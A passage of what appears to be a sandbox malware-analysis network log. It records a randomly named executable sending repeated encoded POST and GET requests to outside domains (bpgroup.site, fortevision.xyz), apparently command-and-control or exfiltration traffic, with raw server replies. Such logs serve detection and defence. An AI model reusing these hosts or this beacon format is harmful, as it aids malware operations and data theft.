                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:20:39.097476959 CET574INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:20:38 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 409
                                                                                          Connection: close
                                                                                          ETag: "66d016cf-199"
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                          Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.54989174.48.143.82802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:45.056838036 CET720OUTPOST /mlxg/ HTTP/1.1
                                                                                          Host: www.bpgroup.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.bpgroup.site
                                                                                          Referer: http://www.bpgroup.site/mlxg/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 34 5a 68 66 33 66 42 76 31 69 59 76 48 7a 56 4f 34 37 6f 7a 48 38 47 76 63 62 6c 78 72 43 49 39 34 41 61 65 41 74 50 6f 4d 45 67 54 7a 45 47 5a 41 37 75 6c 78 37 42 42 57 38 44 55 30 35 77 78 58 70 4c 48 62 76 4b 4f 73 39 38 5a 44 62 4c 47 69 7a 73 76 52 53 6b 74 6d 4e 73 35 38 36 44 77 58 47 49 66 46 61 4c 31 54 79 53 4f 57 6c 50 70 43 58 78 61 30 74 35 32 6f 57 2f 42 62 76 38 41 44 76 70 78 4d 2f 38 74 4c 50 7a 56 6e 4f 37 68 70 66 58 6f 6a 63 66 53 42 44 63 46 36 35 6f 69 2f 68 52 68 45 45 62 73 4e 76 4a 2b 78 52 61 56 32 53 56 78 73 43 34 75 4d 51 3d
                                                                                          Data Ascii: 8z=RSb5LTpCCFtBU4Zhf3fBv1iYvHzVO47ozH8GvcblxrCI94AaeAtPoMEgTzEGZA7ulx7BBW8DU05wxXpLHbvKOs98ZDbLGizsvRSktmNs586DwXGIfFaL1TySOWlPpCXxa0t52oW/Bbv8ADvpxM/8tLPzVnO7hpfXojcfSBDcF65oi/hRhEEbsNvJ+xRaV2SVxsC4uMQ=
                                                                                          Nov 24, 2024 08:20:46.351105928 CET1236INHTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 1251
                                                                                          date: Sun, 24 Nov 2024 07:20:46 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                          Nov 24, 2024 08:20:46.351172924 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.54989774.48.143.82802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:47.719041109 CET740OUTPOST /mlxg/ HTTP/1.1
                                                                                          Host: www.bpgroup.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.bpgroup.site
                                                                                          Referer: http://www.bpgroup.site/mlxg/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 59 70 68 63 55 33 42 2f 6c 69 5a 6a 6e 7a 56 45 59 37 73 7a 48 41 47 76 59 44 31 78 5a 57 49 39 5a 77 61 50 78 74 50 6b 73 45 67 59 54 46 4f 64 41 37 6c 6c 78 32 2b 42 55 6f 44 55 30 74 77 78 57 5a 4c 47 73 44 4a 63 73 39 2b 52 6a 62 46 49 43 7a 73 76 52 53 6b 74 6d 5a 47 35 38 69 44 77 48 32 49 5a 6b 61 49 30 54 79 54 50 57 6c 50 74 43 58 31 61 30 74 68 32 70 62 55 42 64 7a 38 41 43 66 70 78 34 6a 2f 2b 72 50 31 4c 58 50 50 6f 64 53 6c 67 41 6f 6f 66 52 57 57 65 35 45 51 75 70 51 37 37 6d 4d 7a 2f 74 44 78 75 69 5a 74 45 47 7a 38 72 50 53 49 77 62 48 58 57 38 4e 57 74 51 59 42 55 44 4e 31 58 74 6d 42 74 67 55 4f
                                                                                          Data Ascii: 8z=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZWI9ZwaPxtPksEgYTFOdA7llx2+BUoDU0twxWZLGsDJcs9+RjbFICzsvRSktmZG58iDwH2IZkaI0TyTPWlPtCX1a0th2pbUBdz8ACfpx4j/+rP1LXPPodSlgAoofRWWe5EQupQ77mMz/tDxuiZtEGz8rPSIwbHXW8NWtQYBUDN1XtmBtgUO
                                                                                          Nov 24, 2024 08:20:48.959914923 CET1236INHTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 1251
                                                                                          date: Sun, 24 Nov 2024 07:20:49 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                          Nov 24, 2024 08:20:48.960010052 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.54990574.48.143.82802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:50.381197929 CET1757OUTPOST /mlxg/ HTTP/1.1
                                                                                          Host: www.bpgroup.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.bpgroup.site
                                                                                          Referer: http://www.bpgroup.site/mlxg/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 59 70 68 63 55 33 42 2f 6c 69 5a 6a 6e 7a 56 45 59 37 73 7a 48 41 47 76 59 44 31 78 5a 4f 49 38 72 34 61 64 69 46 50 71 4d 45 67 44 7a 46 4e 64 41 37 43 6c 78 75 79 42 55 6b 31 55 32 56 77 77 77 74 4c 42 64 44 4a 57 73 39 2b 64 44 62 49 47 69 79 30 76 52 43 67 74 6d 4a 47 35 38 69 44 77 42 79 49 65 31 61 49 35 7a 79 53 4f 57 6c 35 70 43 58 64 61 30 46 78 32 70 65 76 42 72 44 38 41 69 50 70 71 72 4c 2f 39 4c 50 33 4b 58 50 58 6f 61 61 2b 67 41 6b 65 66 53 4b 34 65 35 73 51 73 38 4e 76 69 32 34 32 39 66 66 51 75 41 39 68 62 33 53 65 67 73 36 2f 32 6f 72 32 63 4e 39 68 75 6b 6f 54 66 77 59 44 45 63 66 62 74 6b 6b 61 35 58 65 33 33 76 75 72 73 6f 49 6d 51 4e 72 59 75 46 36 55 4c 52 61 67 34 5a 4d 72 6d 58 4c 6e 62 6e 79 53 77 79 71 69 31 69 78 70 42 6c 7a 68 78 4f 79 66 6b 73 49 33 71 56 41 36 6c 41 43 74 7a 6d 48 6c 51 6d 4d 79 6b 37 55 33 61 44 61 35 47 55 78 53 72 73 32 31 6a 55 32 76 31 6a 67 45 6b 4b 35 64 4a 67 36 43 75 58 4c 77 70 69 56 46 6b 6e 36 [TRUNCATED]
                                                                                          Data Ascii: 8z=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZOI8r4adiFPqMEgDzFNdA7ClxuyBUk1U2VwwwtLBdDJWs9+dDbIGiy0vRCgtmJG58iDwByIe1aI5zySOWl5pCXda0Fx2pevBrD8AiPpqrL/9LP3KXPXoaa+gAkefSK4e5sQs8Nvi2429ffQuA9hb3Segs6/2or2cN9hukoTfwYDEcfbtkka5Xe33vursoImQNrYuF6ULRag4ZMrmXLnbnySwyqi1ixpBlzhxOyfksI3qVA6lACtzmHlQmMyk7U3aDa5GUxSrs21jU2v1jgEkK5dJg6CuXLwpiVFkn6qB9mBgfZPAuP3baXzhTvRMCyYHu1rcdwfx5f8llCVFRShhM+UVDIBdc5QSD7NN/0H/IS4f14F8BYwkjLmZ8u4247X4RzRGQHHAR9EV69ZzDFATEhYwUKiJU25yXQz+2yitkE5qOw40kDa8IaVjHMbtiCO/G2IWX1GsJ6Zyo8+IAs8RxV3dgskwPk4s6hQSwhq4a/ht2iemn/gWCn9h04ZI4C0HqeX58rFAGh6A95rYcvNxLVxOgVC+n8JfyOJsKGD1PvvMsxm/abXZOpuH5MTxIWsaWB7unlK6kzE7ZB/qJheGbVB8Z7M7Nm4ArEuY29FX+KO9lymXXeiSbNleNwmQuafTHFtTKruMW5GC7EnOmTCYun+1Nq7fi+l6lSCi4muST4gYifsbbymuSg8WdRgeNoV4ZlRyDSLOd+qcfy9gsOmN17LjHzA0bgAt5ySP7xgKHNK2U7cWf6QUodauIQrbVDY6iCDsJg6v05N4rNG8nglRITkiIXTaHH9hpQvU3FKWCyRx2AhZEDwOo2xIabghO4Qx195D6p4CQCIU3gVrCOJpVd/B54pQUZa0lhAHIINM8yi9KexoMmPax4mrOaEYeVoNQeHld24YOSN5DZGDGYOEh2mUfi8snTiHYL3swTIUJRno51oc/gZKLhOXmx3er8H7uFY3e6Yp [TRUNCATED]
                                                                                          Nov 24, 2024 08:20:51.617497921 CET1236INHTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 1251
                                                                                          date: Sun, 24 Nov 2024 07:20:52 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                          Nov 24, 2024 08:20:51.617532015 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.54991274.48.143.82802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:53.042900085 CET472OUTGET /mlxg/?8z=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+xVd2/bH1iEsgunrHUhzfTGxWnvWCfN9FDnBntbsziOAg==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.bpgroup.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:20:54.302943945 CET1236INHTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 1251
                                                                                          date: Sun, 24 Nov 2024 07:20:54 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                          Nov 24, 2024 08:20:54.302983999 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.54992713.248.169.48802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:59.693301916 CET729OUTPOST /dash/ HTTP/1.1
                                                                                          Host: www.fortevision.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.fortevision.xyz
                                                                                          Referer: http://www.fortevision.xyz/dash/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 56 4f 76 68 74 72 41 48 41 55 51 64 69 73 4f 58 5a 4e 4c 6a 63 4b 4b 64 30 73 66 4f 32 4a 42 53 61 48 45 52 32 54 33 63 53 4b 6a 76 52 76 56 67 4a 6c 74 75 45 44 6f 42 51 68 78 31 6f 65 41 68 31 2f 48 4e 33 72 39 50 79 47 59 50 70 6a 59 4f 33 67 4e 50 6a 75 39 6a 55 4a 53 44 44 39 49 32 76 2f 6a 30 2b 35 63 75 78 46 55 2f 75 39 33 69 78 34 71 61 65 65 65 53 58 50 75 50 73 38 68 32 7a 66 66 78 5a 72 57 76 74 63 59 4f 54 33 59 4c 31 65 53 47 79 64 73 7a 65 66 42 36 57 4b 74 37 74 6a 4e 4a 4c 70 7a 33 4b 2f 32 50 30 49 39 6b 36 77 33 45 63 45 37 54 51 4c 66 49 44 32 4a 6b 45 55 41 45 34 63 6f 3d
                                                                                          Data Ascii: 8z=VOvhtrAHAUQdisOXZNLjcKKd0sfO2JBSaHER2T3cSKjvRvVgJltuEDoBQhx1oeAh1/HN3r9PyGYPpjYO3gNPju9jUJSDD9I2v/j0+5cuxFU/u93ix4qaeeeSXPuPs8h2zffxZrWvtcYOT3YL1eSGydszefB6WKt7tjNJLpz3K/2P0I9k6w3EcE7TQLfID2JkEUAE4co=


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.54993513.248.169.48802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:02.420437098 CET749OUTPOST /dash/ HTTP/1.1
                                                                                          Host: www.fortevision.xyz
